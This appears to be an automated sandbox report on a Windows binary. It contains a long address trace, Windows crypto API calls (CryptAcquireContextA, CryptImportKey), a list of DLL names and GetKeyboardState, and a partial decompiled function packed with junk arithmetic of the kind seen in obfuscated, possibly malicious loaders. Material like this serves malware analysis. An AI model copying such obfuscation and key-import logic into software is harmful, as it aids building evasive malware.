                                                0x004f1600
                                                0x004f1606
                                                0x004f1623
                                                0x004f1628
                                                0x004f1608
                                                0x004f1608
                                                0x004f160d
                                                0x004f161c
                                                0x004f161c
                                                0x004f163a
                                                0x004f1647
                                                0x004f1652
                                                0x004f1655
                                                0x004f165d
                                                0x004f1660
                                                0x004f1665
                                                0x004f1672
                                                0x004f1679
                                                0x004f1680
                                                0x004f1682
                                                0x004f1685
                                                0x004f1693
                                                0x004f16b8
                                                0x004f16b8
                                                0x004f16bb
                                                0x004f16c1
                                                0x004f16cc
                                                0x004f1695
                                                0x004f1697
                                                0x004f169e
                                                0x004f16a0
                                                0x004f16a3
                                                0x004f16a8
                                                0x004f16ad
                                                0x004f169e
                                                0x004f16cf
                                                0x004f16de
                                                0x004f16e3
                                                0x004f16e4
                                                0x004f16e9
                                                0x004f16ec
                                                0x004f16f5
                                                0x004f16fe
                                                0x004f1707
                                                0x004f170c
                                                0x004f1713
                                                0x004f1715
                                                0x004f171a
                                                0x004f171d
                                                0x004f1721
                                                0x004f1723
                                                0x004f1729
                                                0x004f172a
                                                0x004f1730
                                                0x004f1736
                                                0x004f1740
                                                0x004f1745
                                                0x004f1721
                                                0x004f1755
                                                0x004f1758
                                                0x004f175e
                                                0x004f1761
                                                0x004f1764
                                                0x004f1774
                                                0x004f1784
                                                0x004f1796
                                                0x004f179b
                                                0x004f17a2
                                                0x004f17a4
                                                0x004f17b5
                                                0x004f17c1
                                                0x004f17c4
                                                0x004f17c9
                                                0x004f17d0
                                                0x004f17d7
                                                0x004f17d9
                                                0x004f17dc
                                                0x004f17e4
                                                0x004f17e7
                                                0x004f17ed
                                                0x004f17f5
                                                0x004f17fa
                                                0x004f17fd
                                                0x004f180b
                                                0x004f1810
                                                0x004f1813
                                                0x004f182c
                                                0x004f182f
                                                0x004f183a
                                                0x004f183f
                                                0x004f184a
                                                0x004f1850
                                                0x004f1852
                                                0x004f185a
                                                0x004f185a
                                                0x004f1868
                                                0x004f187b
                                                0x004f1886
                                                0x004f188c
                                                0x004f18a0
                                                0x004f18a5
                                                0x004f18a5
                                                0x004f18a8
                                                0x004f188e
                                                0x004f188e
                                                0x004f1899
                                                0x004f1899
                                                0x004f186a
                                                0x004f186a
                                                0x004f1874
                                                0x004f1874
                                                0x004f18bb
                                                0x004f18c0
                                                0x004f18c8
                                                0x004f18d1
                                                0x004f18da
                                                0x004f18dd
                                                0x004f18e2
                                                0x004f18e7
                                                0x004f18ec
                                                0x004f18f7
                                                0x004f18fa
                                                0x004f1901
                                                0x004f190b
                                                0x004f1912
                                                0x004f1915
                                                0x004f1919
                                                0x004f191b
                                                0x004f1926
                                                0x004f1936
                                                0x004f1936
                                                0x004f1943
                                                0x004f1948
                                                0x004f195a
                                                0x004f1960
                                                0x004f1967
                                                0x004f1971
                                                0x004f197b
                                                0x004f1990
                                                0x004f1998
                                                0x004f2b1d
                                                0x004f2b1f
                                                0x004f2b28
                                                0x004f2b2d
                                                0x004f2b32
                                                0x004f2b38
                                                0x004f2b3f
                                                0x004f2b47
                                                0x004f2b47
                                                0x004f2b4c
                                                0x004f2b4c
                                                0x004f2b52
                                                0x004f2b59
                                                0x004f2b7f
                                                0x004f2b7f
                                                0x004f2b82
                                                0x004f2b88
                                                0x004f2b93
                                                0x004f2b5b
                                                0x004f2b5b
                                                0x004f2b60
                                                0x004f2b61
                                                0x004f2b67
                                                0x004f2b6d
                                                0x004f2b77
                                                0x004f2b77
                                                0x004f2b96
                                                0x004f2b9b
                                                0x004f2bb5
                                                0x004f2bbe
                                                0x004f2bc7
                                                0x004f2bca
                                                0x004f2bcf
                                                0x004f2bd5
                                                0x004f2bdc
                                                0x004f2be4
                                                0x004f2be4
                                                0x004f2be9
                                                0x004f2be9
                                                0x004f2bef
                                                0x004f2bf9
                                                0x004f2c07
                                                0x004f2c0c
                                                0x004f2bfb
                                                0x004f2bfb
                                                0x004f2c00
                                                0x004f2c00
                                                0x004f2c13
                                                0x004f2c16
                                                0x004f2c19
                                                0x004f2c26
                                                0x004f2c33
                                                0x004f2c3c
                                                0x004f2c3f
                                                0x004f2c49
                                                0x004f2c4e
                                                0x004f2c53
                                                0x004f2c58
                                                0x004f2c5d
                                                0x004f2c63
                                                0x004f2c6a
                                                0x004f2c6d
                                                0x004f2c6d
                                                0x004f2c73
                                                0x004f2c73
                                                0x004f2c76
                                                0x004f2c79
                                                0x004f2c7e
                                                0x004f2c8b
                                                0x004f199e
                                                0x004f19a6
                                                0x004f19ac
                                                0x004f19b7
                                                0x004f19c0
                                                0x004f19c6
                                                0x004f19cb
                                                0x004f19ce
                                                0x004f19dc
                                                0x004f19e4
                                                0x004f19e7
                                                0x004f19ea
                                                0x004f19f2
                                                0x004f19f9
                                                0x004f19fb
                                                0x004f1a05
                                                0x004f1a0a
                                                0x004f1a24
                                                0x004f1a2c
                                                0x004f2a7b
                                                0x004f2a86
                                                0x004f2a8b
                                                0x004f2a90
                                                0x004f2a97
                                                0x004f2a9a
                                                0x004f2a9a
                                                0x004f2aa3
                                                0x004f2aa6
                                                0x004f2ab0
                                                0x004f2ab5
                                                0x004f2aba
                                                0x004f2abf
                                                0x004f2ac4
                                                0x004f2aca
                                                0x004f2acf
                                                0x004f2acf
                                                0x004f2ad2
                                                0x004f2ad2
                                                0x004f2ad5
                                                0x004f2ada
                                                0x004f2ae7
                                                0x004f2aed
                                                0x004f2af8
                                                0x004f2b08
                                                0x004f2b0d
                                                0x004f2b12
                                                0x004f2b17
                                                0x004f2b17
                                                0x004f2b1a
                                                0x004f2b1a
                                                0x00000000
                                                0x004f1a32
                                                0x004f1a35
                                                0x004f1a3e
                                                0x004f1a47
                                                0x004f1a4c
                                                0x004f1a4f
                                                0x004f1a53
                                                0x004f1a55
                                                0x004f1a5b
                                                0x004f1a62
                                                0x004f1a6c
                                                0x004f1a71
                                                0x004f1a7d
                                                0x004f1a84
                                                0x004f1a89
                                                0x004f1a8a
                                                0x004f1a8f
                                                0x004f1a92
                                                0x004f1aa5
                                                0x004f1aac
                                                0x004f1aaf
                                                0x004f1ab4
                                                0x004f1ab9
                                                0x004f1ac3
                                                0x004f1ac8
                                                0x004f1acd
                                                0x004f1ad3
                                                0x004f1ad5
                                                0x004f1add
                                                0x004f1ae7
                                                0x004f1af2
                                                0x004f1afd
                                                0x004f1afd
                                                0x004f1b00
                                                0x004f1b0a
                                                0x004f1b0f
                                                0x004f1b17
                                                0x004f1b1c
                                                0x004f1b27
                                                0x004f1b2c
                                                0x004f1b31
                                                0x004f1b38
                                                0x004f1b39
                                                0x004f1b3e
                                                0x004f1b41
                                                0x004f1b48
                                                0x004f1b4d
                                                0x004f1b50
                                                0x004f1b52
                                                0x004f1b55
                                                0x004f1b63
                                                0x004f1b68
                                                0x004f1b6b
                                                0x004f1b71
                                                0x004f1b76
                                                0x004f1b7b
                                                0x004f1b80
                                                0x004f1b85
                                                0x004f1b88
                                                0x004f1b96
                                                0x004f1b9b
                                                0x004f1ba2
                                                0x004f1ba4
                                                0x004f1ba9
                                                0x004f1bb0
                                                0x004f1bb2
                                                0x004f1bb5
                                                0x004f1bba
                                                0x004f1bbf
                                                0x004f1bcc
                                                0x004f1bcf
                                                0x004f1be3
                                                0x004f1be8
                                                0x004f1bf2
                                                0x004f1c01
                                                0x004f1c02
                                                0x004f1c05
                                                0x004f1c0e
                                                0x004f1c11
                                                0x004f1c16
                                                0x004f1c1b
                                                0x004f1c25
                                                0x004f1c2a
                                                0x004f1c2f
                                                0x004f1c35
                                                0x004f1c83
                                                0x004f1c8d
                                                0x004f1c37
                                                0x004f1c37
                                                0x004f1c3c
                                                0x004f1c44
                                                0x004f1c47
                                                0x004f1c4c
                                                0x004f1c53
                                                0x004f1c5a
                                                0x004f1c5c
                                                0x004f1c67
                                                0x004f1c6d
                                                0x004f1c78
                                                0x004f1c7b
                                                0x004f1c5a
                                                0x004f1c92
                                                0x004f1c97
                                                0x004f1c9f
                                                0x004f1cac
                                                0x004f1cb9
                                                0x004f1cb9
                                                0x004f1cc6
                                                0x004f1cd0
                                                0x004f1cd0
                                                0x004f1cd8
                                                0x004f1ce4
                                                0x004f1ced
                                                0x004f1cf2
                                                0x004f1cf9
                                                0x004f1cfb
                                                0x004f1d00
                                                0x004f1d03
                                                0x004f1d07
                                                0x004f1d09
                                                0x004f1d0c
                                                0x004f1d11
                                                0x004f1d15
                                                0x004f1d1e
                                                0x004f1d23
                                                0x004f1d29
                                                0x004f1d35
                                                0x004f1d3e
                                                0x004f1d41
                                                0x004f1d4c
                                                0x004f1d53
                                                0x004f1d5b
                                                0x004f1d64
                                                0x004f1d72
                                                0x004f1d9f
                                                0x004f1da2
                                                0x004f1dcd
                                                0x004f1dd0
                                                0x004f1dd5
                                                0x004f1dd5
                                                0x004f1dd8
                                                0x004f1da4
                                                0x004f1da4
                                                0x004f1da6
                                                0x004f1da9
                                                0x004f1db7
                                                0x004f1dbc
                                                0x004f1dbf
                                                0x004f1dbf
                                                0x004f1dc5
                                                0x004f1de4
                                                0x004f1de9
                                                0x004f1dee
                                                0x004f1dee
                                                0x004f1df1
                                                0x004f1df6
                                                0x004f1dfb
                                                0x004f1d74
                                                0x004f1d76
                                                0x004f1d7d
                                                0x004f1d7f
                                                0x004f1d8a
                                                0x004f1d8d
                                                0x004f1d97
                                                0x004f1d97
                                                0x004f1e00
                                                0x004f1e05
                                                0x004f1e0a
                                                0x004f1e0f
                                                0x004f1e14
                                                0x004f1e1e
                                                0x004f1e23
                                                0x004f1e2b
                                                0x00000000
                                                0x004f2455
                                                0x004f2459
                                                0x004f2467
                                                0x00000000
                                                0x00000000
                                                0x004f245b
                                                0x004f245b
                                                0x004f245f
                                                0x004f1e35
                                                0x004f1e35
                                                0x004f1e39
                                                0x004f1e46
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004f1e3b
                                                0x004f1e3b
                                                0x004f1e42
                                                0x004f1e98
                                                0x004f1ea0
                                                0x004f1ea9
                                                0x004f1eaf
                                                0x004f1eba
                                                0x004f1ec9
                                                0x004f1ecb
                                                0x004f1f03
                                                0x004f1f08
                                                0x004f1f08
                                                0x004f1f0d
                                                0x004f1ecd
                                                0x004f1ecf
                                                0x004f1ed2
                                                0x004f1ed6
                                                0x004f1ed8
                                                0x004f1ee1
                                                0x004f1ee4
                                                0x004f1ee4
                                                0x004f1ef2
                                                0x004f1efc
                                                0x004f1efc
                                                0x004f1f12
                                                0x004f1f17
                                                0x004f1f1c
                                                0x004f1f21
                                                0x004f1f21
                                                0x004f1f26
                                                0x004f1f2b
                                                0x004f1f36
                                                0x004f1f3e
                                                0x004f1e44
                                                0x004f1e48
                                                0x004f1e48
                                                0x004f1e4d
                                                0x004f1e52
                                                0x004f1e57
                                                0x004f1e64
                                                0x004f1e67
                                                0x004f1e6c
                                                0x004f1e77
                                                0x004f1e82
                                                0x004f1e90
                                                0x004f1e90
                                                0x004f1e42
                                                0x004f1f43
                                                0x004f1f46
                                                0x004f1f4a
                                                0x004f1f4c
                                                0x004f1f55
                                                0x004f1f58
                                                0x004f1f58
                                                0x004f1f6b
                                                0x004f1f70
                                                0x004f1f75
                                                0x004f1f77
                                                0x004f1f77
                                                0x004f1f7b
                                                0x004f1f7b
                                                0x004f1f7e
                                                0x004f1f88
                                                0x004f1f91
                                                0x004f1f96
                                                0x004f1f99
                                                0x004f1f9d
                                                0x004f1f9f
                                                0x004f1faa
                                                0x004f1fad
                                                0x004f1fad
                                                0x004f1fb3
                                                0x004f1fbd
                                                0x004f1fc8
                                                0x004f1fc9
                                                0x004f1fcf
                                                0x004f1fd2
                                                0x004f1fd6
                                                0x004f1fd8
                                                0x004f1fdb
                                                0x004f1fed
                                                0x004f1ff8
                                                0x004f1ffb
                                                0x004f1ffd
                                                0x004f2000
                                                0x004f2000
                                                0x004f200b
                                                0x004f2010
                                                0x004f2017
                                                0x004f2022
                                                0x004f2027
                                                0x004f202a
                                                0x004f204b
                                                0x004f204b
                                                0x004f204e
                                                0x004f2054
                                                0x004f205f
                                                0x004f202c
                                                0x004f2032
                                                0x004f2038
                                                0x004f2043
                                                0x004f2043
                                                0x004f202a
                                                0x004f2062
                                                0x004f206d
                                                0x004f2072
                                                0x004f2077
                                                0x004f2077
                                                0x004f207c
                                                0x004f207c
                                                0x004f207f
                                                0x004f208a
                                                0x004f208f
                                                0x004f2092
                                                0x004f2092
                                                0x004f209c
                                                0x004f20a1
                                                0x004f20a6
                                                0x004f20b1
                                                0x004f20b4
                                                0x004f20c2
                                                0x004f20cc
                                                0x004f20d1
                                                0x004f20d1
                                                0x004f20b6
                                                0x004f20b6
                                                0x004f20bb
                                                0x004f20bb
                                                0x004f20db
                                                0x004f20e6
                                                0x004f20eb
                                                0x004f20f0
                                                0x004f20f8
                                                0x004f2110
                                                0x004f2116
                                                0x004f2118
                                                0x004f22a5
                                                0x004f22ae
                                                0x004f22b1
                                                0x004f22b6
                                                0x004f22c6
                                                0x004f22c9
                                                0x004f22d6
                                                0x004f22db
                                                0x004f22e1
                                                0x004f22e8
                                                0x004f22f0
                                                0x004f22f0
                                                0x004f22f5
                                                0x004f22f5
                                                0x004f22fb
                                                0x004f2305
                                                0x004f230a
                                                0x004f230a
                                                0x004f230f
                                                0x004f2315
                                                0x004f2320
                                                0x004f2320
                                                0x004f22cb
                                                0x004f22d1
                                                0x004f22d1
                                                0x004f2325
                                                0x004f2328
                                                0x004f232c
                                                0x004f232e
                                                0x004f2333
                                                0x004f2336
                                                0x004f2340
                                                0x004f2350
                                                0x004f2350
                                                0x004f2360
                                                0x004f211e
                                                0x004f2124
                                                0x004f212d
                                                0x004f2133
                                                0x004f213e
                                                0x004f2149
                                                0x004f214c
                                                0x004f2156
                                                0x004f2161
                                                0x004f2166
                                                0x004f2169
                                                0x004f216d
                                                0x004f216f
                                                0x004f2172
                                                0x004f217c
                                                0x004f2181
                                                0x004f2181
                                                0x004f2198
                                                0x004f21a3
                                                0x004f21a7
                                                0x004f21aa
                                                0x004f21ae
                                                0x004f21b4
                                                0x004f21c5
                                                0x004f21ca
                                                0x004f21cf
                                                0x004f21dc
                                                0x004f21e5
                                                0x004f21e8
                                                0x004f21f2
                                                0x004f21f7
                                                0x004f21fc
                                                0x004f2201
                                                0x004f2206
                                                0x004f220c
                                                0x004f2229
                                                0x004f2229
                                                0x004f222d
                                                0x004f220e
                                                0x004f2210
                                                0x004f2219
                                                0x004f2219
                                                0x004f2230
                                                0x004f2230
                                                0x004f223a
                                                0x004f2244
                                                0x004f224a
                                                0x004f2255
                                                0x004f225a
                                                0x004f225f
                                                0x004f2264
                                                0x004f226f
                                                0x004f2274
                                                0x004f227f
                                                0x004f2284
                                                0x004f228c
                                                0x004f2294
                                                0x00000000
                                                0x004f2294
                                                0x00000000
                                                0x004f2465
                                                0x004f245f
                                                0x004f246d
                                                0x004f2477
                                                0x004f2486
                                                0x004f2491
                                                0x004f2499
                                                0x004f24ae
                                                0x004f24b2
                                                0x004f24b9
                                                0x004f24bb
                                                0x004f24c6
                                                0x004f24cb
                                                0x004f24d1
                                                0x004f24d6
                                                0x004f24d6
                                                0x004f24de
                                                0x004f24e3
                                                0x004f24e6
                                                0x004f24e6
                                                0x004f24f1
                                                0x004f24ff
                                                0x004f2503
                                                0x004f2506
                                                0x004f250a
                                                0x004f250c
                                                0x004f250f
                                                0x004f2514
                                                0x004f2518
                                                0x004f2526
                                                0x004f2529
                                                0x004f250a
                                                0x004f252f
                                                0x004f2532
                                                0x004f253c
                                                0x004f254c
                                                0x004f2558
                                                0x004f2561
                                                0x004f2566
                                                0x004f256d
                                                0x004f256f
                                                0x004f2578
                                                0x004f257d
                                                0x004f2585
                                                0x004f258a
                                                0x004f258d
                                                0x004f2593
                                                0x004f2596
                                                0x004f2599
                                                0x004f259f
                                                0x004f25a7
                                                0x004f25ae
                                                0x004f25b0
                                                0x004f25b3
                                                0x004f25b8
                                                0x004f25bd
                                                0x004f25c3
                                                0x004f25ce
                                                0x004f25dc
                                                0x004f25f0
                                                0x004f25f5
                                                0x004f25f5
                                                0x004f25fb
                                                0x004f25de
                                                0x004f25de
                                                0x004f25e9
                                                0x004f25e9
                                                0x004f2600
                                                0x004f2605
                                                0x004f260a
                                                0x004f260f
                                                0x004f2615
                                                0x004f2617
                                                0x004f2622
                                                0x004f2622
                                                0x004f2615
                                                0x004f262d
                                                0x004f2630
                                                0x004f263a
                                                0x004f263f
                                                0x004f2644
                                                0x004f2649
                                                0x004f264e
                                                0x004f2654
                                                0x004f26be
                                                0x004f26c1
                                                0x004f26c5
                                                0x004f26c7
                                                0x004f26ca
                                                0x004f26cf
                                                0x004f26d4
                                                0x004f26d4
                                                0x004f26e0
                                                0x004f26e5
                                                0x004f26ed
                                                0x004f26f3
                                                0x004f26f3
                                                0x004f26f8
                                                0x004f2656
                                                0x004f2656
                                                0x004f2660
                                                0x004f2665
                                                0x004f266a
                                                0x004f2670
                                                0x004f2672
                                                0x004f267c
                                                0x004f2681
                                                0x004f2686
                                                0x004f268c
                                                0x004f269b
                                                0x004f269b
                                                0x004f268c
                                                0x004f26a6
                                                0x004f26ac
                                                0x004f26b7
                                                0x004f26b7
                                                0x004f26fd
                                                0x004f2700
                                                0x004f2705
                                                0x004f270a
                                                0x004f2715
                                                0x004f2725
                                                0x004f2730
                                                0x004f2735
                                                0x004f273b
                                                0x004f2744
                                                0x004f274e
                                                0x004f275d
                                                0x004f2764
                                                0x004f2767
                                                0x004f276a
                                                0x004f277a
                                                0x004f277e
                                                0x004f2781
                                                0x004f278f
                                                0x004f2794
                                                0x004f2797
                                                0x004f27a6
                                                0x004f27b3
                                                0x004f27bb
                                                0x004f27a8
                                                0x004f27ae
                                                0x004f27ae
                                                0x004f27c4
                                                0x004f27c4
                                                0x004f27c7
                                                0x004f27d5
                                                0x004f2812
                                                0x004f281d
                                                0x004f27d7
                                                0x004f27d7
                                                0x004f27df
                                                0x004f27ea
                                                0x004f27f1
                                                0x004f27f8
                                                0x004f27fa
                                                0x004f27fd
                                                0x004f2805
                                                0x004f280a
                                                0x004f27f8
                                                0x004f2822
                                                0x004f282d
                                                0x004f283b
                                                0x004f2870
                                                0x004f2870
                                                0x004f287a
                                                0x004f283d
                                                0x004f283d
                                                0x004f2847
                                                0x004f284c
                                                0x004f2851
                                                0x004f2856
                                                0x004f285b
                                                0x004f2861
                                                0x004f2869
                                                0x004f2869
                                                0x004f2861
                                                0x004f287f
                                                0x004f2884
                                                0x004f288c
                                                0x004f2897
                                                0x004f289c
                                                0x004f28a3
                                                0x004f28a5
                                                0x004f28b0
                                                0x004f28b5
                                                0x004f28be
                                                0x004f28cb
                                                0x004f28d8
                                                0x004f28d8
                                                0x004f28e8
                                                0x004f28f0
                                                0x004f28f3
                                                0x004f28f8
                                                0x004f2905
                                                0x004f2912
                                                0x004f2912
                                                0x004f291f
                                                0x004f292c
                                                0x004f292e
                                                0x004f2931
                                                0x004f2939
                                                0x004f293e
                                                0x004f2941
                                                0x004f2941
                                                0x004f2921
                                                0x004f2927
                                                0x004f2927
                                                0x004f291f
                                                0x004f2947
                                                0x004f2952
                                                0x004f2958
                                                0x004f2962
                                                0x004f2967
                                                0x004f296c
                                                0x004f296c
                                                0x004f2973
                                                0x004f295a
                                                0x004f295d
                                                0x004f295d
                                                0x004f2978
                                                0x004f2980
                                                0x004f2985
                                                0x004f298a
                                                0x004f298b
                                                0x004f2997
                                                0x004f299c
                                                0x004f29a1
                                                0x004f29a1
                                                0x004f2455
                                                0x004f1a2c
                                                0x004f1998
                                                0x004f13d6
                                                0x00000000

                                                APIs
                                                • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,0000005D,00000000,004F30C8,?,00000254,00000000,004F31F8), ref: 004F11C3
                                                • CryptImportKey.ADVAPI32(?,004FC554,00000254,00000000,00000000,?,?,00000000,004F2FF6,?,?,00000254,00000000,004F31F8), ref: 004F12E7
                                                • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,004F2EFA,?,44632301,?,?,00000254,00000000,004F31F8), ref: 004F13CE
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp Download File
                                                Similarity
                                                • API ID: Crypt$AcquireContext$Import
                                                • String ID: /$CNB_0309.DLL$CNB_0317.DLL$GetKeyboardState$Microsoft.WSMan.Management.ni.dll$NetEnumerateServiceAccounts$System.Runtime.Remoting.dll$WcnEapPeerProxy.dll$WininetPlugin.dll$api-ms-win-core-datetime-l1-1-0.dll$api-ms-win-core-util-l1-1-0.dll$davclnt.dll$dmintf.dll$dxmasf.dll$mqcertui.dll$repdrvfs.dll$rtm.dll
                                                • API String ID: 3710563934-681767285
                                                • Opcode ID: 02e48a48f09d573dc4ab70e182b3af70aaabd177087fe64a82d3fdabe1f78294
                                                • Instruction ID: 5a1a609fc73b505021b261c3b840208a3c67837b18326f053143dae08eb1a50b
                                                • Opcode Fuzzy Hash: 02e48a48f09d573dc4ab70e182b3af70aaabd177087fe64a82d3fdabe1f78294
                                                • Instruction Fuzzy Hash: 1D23E275D00249DFDB00DFAAE984AADBBF1FB08306F10843AE505E7265D778A951CF29
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 69%
                                                			E004F5C80(char __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
                                                				char _v8;
                                                				intOrPtr _v12;
                                                				char _v16;
                                                				signed int _v20;
                                                				char _v24;
                                                				signed int _v28;
                                                				char _v32;
                                                				char _v36;
                                                				long* _v40;
                                                				char _v44;
                                                				char _v48;
                                                				char _v52;
                                                				intOrPtr _v56;
                                                				intOrPtr _v60;
                                                				signed int _v64;
                                                				signed int _v68;
                                                				signed int _v72;
                                                				intOrPtr _t138;
                                                				signed int _t141;
                                                				signed int _t142;
                                                				int _t147;
                                                				signed int _t148;
                                                				signed int _t150;
                                                				signed int _t152;
                                                				signed int _t165;
                                                				signed int _t167;
                                                				intOrPtr _t169;
                                                				signed int _t173;
                                                				signed int _t177;
                                                				signed int _t180;
                                                				void* _t184;
                                                				signed int _t185;
                                                				intOrPtr _t186;
                                                				signed int _t188;
                                                				signed int _t190;
                                                				signed int _t191;
                                                				signed int _t192;
                                                				signed int _t194;
                                                				signed int _t195;
                                                				signed int _t196;
                                                				intOrPtr _t197;
                                                				signed int _t208;
                                                				signed int _t213;
                                                				signed int _t215;
                                                				signed int _t217;
                                                				signed int _t218;
                                                				signed int _t220;
                                                				signed int _t222;
                                                				signed int _t223;
                                                				signed int _t227;
                                                				signed int _t230;
                                                				signed int _t234;
                                                				signed int _t235;
                                                				signed int _t237;
                                                				signed int _t241;
                                                				signed int _t242;
                                                				signed int _t243;
                                                				signed int _t245;
                                                				signed int _t247;
                                                				void* _t254;
                                                				signed int _t255;
                                                				signed int _t258;
                                                				signed int _t260;
                                                				signed int _t262;
                                                				signed int _t272;
                                                				signed int _t279;
                                                				signed int _t281;
                                                				signed int _t282;
                                                				signed int _t288;
                                                				signed int _t290;
                                                				signed int _t291;
                                                				signed int _t293;
                                                				signed int _t296;
                                                				signed int _t297;
                                                				signed int _t300;
                                                				signed int _t309;
                                                				signed int _t311;
                                                				signed int _t312;
                                                				signed int _t319;
                                                				signed int _t320;
                                                				signed int _t326;
                                                				signed int _t328;
                                                				signed int _t332;
                                                				signed int _t337;
                                                				signed int _t340;
                                                				signed int _t342;
                                                				signed int _t343;
                                                				signed int _t344;
                                                				signed int _t348;
                                                				signed int _t350;
                                                				signed int _t354;
                                                				signed int _t355;
                                                				signed int _t358;
                                                				signed int _t361;
                                                				signed int _t364;
                                                				signed int _t366;
                                                				signed int _t374;
                                                				signed int _t375;
                                                				signed int _t377;
                                                				signed int _t378;
                                                				signed int _t379;
                                                				signed int _t380;
                                                				signed int _t382;
                                                				signed int _t383;
                                                				signed int _t385;
                                                				signed int _t390;
                                                				signed int _t391;
                                                				signed int _t392;
                                                				signed int _t394;
                                                				signed int _t402;
                                                				signed int _t407;
                                                				signed int _t413;
                                                				intOrPtr _t420;
                                                				intOrPtr _t421;
                                                				char _t422;
                                                				intOrPtr _t426;
                                                				intOrPtr _t428;
                                                				intOrPtr _t435;
                                                				signed int _t439;
                                                				void* _t453;
                                                				void* _t454;
                                                				intOrPtr _t455;
                                                				void* _t460;
                                                				void* _t462;
                                                				signed int _t463;
                                                				void* _t473;
                                                				void* _t481;
                                                				void* _t485;
                                                
                                                				_t451 = __esi;
                                                				_t450 = __edi;
                                                				_t396 = __ebx;
                                                				_t453 = _t454;
                                                				_t455 = _t454 + 0xffffffbc;
                                                				_push(__ebx);
                                                				_push(__esi);
                                                				_push(__edi);
                                                				_v16 = 0;
                                                				_v20 = 0;
                                                				_v24 = 0;
                                                				_v28 = 0;
                                                				_v32 = 0;
                                                				_v52 = 0;
                                                				_v12 = __edx;
                                                				_v8 = __eax;
                                                				E00406A9C(_v8);
                                                				_push(_t453);
                                                				_push(0x4f6673);
                                                				_push( *[fs:eax]);
                                                				 *[fs:eax] = _t455;
                                                				_t138 =  *0x4fef48; // 0xc3c34ef0
                                                				_v72 = _t138 + 0x49;
                                                				asm("fild dword [ebp-0x44]");
                                                				E004FEF34 = E004048CC();
                                                				_t141 =  *0x4feeec; // 0xb52124f2
                                                				 *0x4fef44 = _t141;
                                                				_t142 = E004FEF34; // 0xc3c34ef0
                                                				E004FEF50 = (_t142 << 2) + (_t142 << 2) * 4;
                                                				_push(_t453);
                                                				_push(0x4f65dc);
                                                				_push( *[fs:eax]);
                                                				 *[fs:eax] = _t455;
                                                				_t147 = CryptAcquireContextA( &_v40, 0, 0, 1, 0xf0000000); // executed
                                                				if(_t147 == 0) {
                                                					_t148 =  *0x4feecc; // 0xd26bafe0
                                                					E004FEF0C = _t148;
                                                					asm("fild dword [0x4fef14]");
                                                					 *0x4fef18 = E004048CC();
                                                					_t150 =  *0x4fef44; // 0x38993
                                                					 *0x4fef30 = _t150;
                                                					_t152 =  *0x4feefc; // 0x4b08dcc7
                                                					E004FEF38 = _t152 + 0x33;
                                                					E00406CF4( &_v32, L"iaspolcy.dll");
                                                					_pop(_t420);
                                                					 *[fs:eax] = _t420;
                                                					__eflags = 0;
                                                					_pop(_t421);
                                                					 *[fs:eax] = _t421;
                                                					_push(E004F667A);
                                                					_t422 = "`\\O"; // 0x4f5c60
                                                					E0040859C( &_v52, _t422);
                                                					E00406A08( &_v32, 5);
                                                					return E004069CC( &_v8);
                                                				} else {
                                                					 *0x4fef18 = E004FEF10 * 0xa7;
                                                					_t165 =  *0x4fef3c; // 0x1cb932a9
                                                					 *0x4fef30 = _t165 + 0x40;
                                                					_t167 =  *0x4feed8; // 0x1cb9338e
                                                					 *0x4fef3c = _t167 + 0xd8;
                                                					_t169 =  *0x4fef48; // 0xc3c34ef0
                                                					 *0x4fef48 = E0040489C(_t169);
                                                					 *0x4feea0 =  *0x4feed8 * 0x3c;
                                                					 *[fs:eax] = _t455;
                                                					_t173 = E004FEED0; // 0xc3c34ef0
                                                					E004FEF00 = _t173 *  *0x4feef4;
                                                					E00406CF4( &_v24, L"Microsoft.WSMan.Management.dll");
                                                					_t177 =  *0x4feea0; // 0xa1d900
                                                					E004FEF38 = _t177;
                                                					 *0x4fef44 = 0x67 -  *0x4feef4;
                                                					_t180 = E004FEF10; // 0x1cb931c0
                                                					 *0x4feecc = _t180 + 0x65;
                                                					_t184 =  *0x505974(_v40, 0x8003, 0, 0,  &_v44,  *[fs:eax], 0x4f6587, _t453); // executed
                                                					if(_t184 == 0) {
                                                						_t185 =  *0x4fef28; // 0x3c79b5d4
                                                						 *0x4feecc = _t185;
                                                						_t186 =  *0x4feea8; // 0x0
                                                						_t426 =  *0x4feec4; // 0x0
                                                						E00407640(_t186, _t426);
                                                						if(__eflags == 0) {
                                                							E004F0EBC( &_v36,  &E004FEF38, __eflags);
                                                							_t234 =  *0x4fef04 * 0x8a;
                                                							__eflags = _t234;
                                                							 *0x4feeec = _t234;
                                                							_t235 = E004FEED0; // 0xc3c34ef0
                                                							 *0x4feef4 = _t235;
                                                							asm("fild dword [0x4fef18]");
                                                							 *0x4fef04 = E004048CC();
                                                						}
                                                						_t188 =  *0x4fef18; // 0xbc3e19a
                                                						E004FEF20 = _t188 +  *0x4fef40;
                                                						_t190 =  *0x4feeb8; // 0x0
                                                						_v64 = _t190;
                                                						__eflags = _v64;
                                                						if(_v64 != 0) {
                                                							_t230 = _v64 - 4;
                                                							__eflags = _t230;
                                                							_v64 =  *_t230;
                                                						}
                                                						__eflags = _v64 - 0x53;
                                                						if(_v64 != 0x53) {
                                                							_t191 = E004FEF0C; // 0xb52124bf
                                                							_t192 = _t191 + 4;
                                                							__eflags = _t192;
                                                							_v72 = _t192;
                                                							asm("fild dword [ebp-0x44]");
                                                							 *0x4feefc = E004048D8();
                                                						} else {
                                                							_t222 =  *0x4fef30; // 0xa1d816
                                                							E004FEF38 = _t222;
                                                							_t223 = E004FEF38; // 0xc3c34fdc
                                                							__eflags = _t223 -  *0x4feef4; // 0xb52124ca
                                                							if(__eflags >= 0) {
                                                								E00407678(_v16, 0, 1,  &_v16);
                                                							} else {
                                                								_t227 = E004FEF2C; // 0xa1d900
                                                								 *0x4fef4c = _t227 + 4;
                                                							}
                                                						}
                                                						_t194 = E004FEF38; // 0xc3c34fdc
                                                						E004FEF10 = _t194;
                                                						_t195 = E004FEF10; // 0x1cb931c0
                                                						_push(_t195);
                                                						_t196 =  *0x4fef18; // 0xbc3e19a
                                                						_push(_t196);
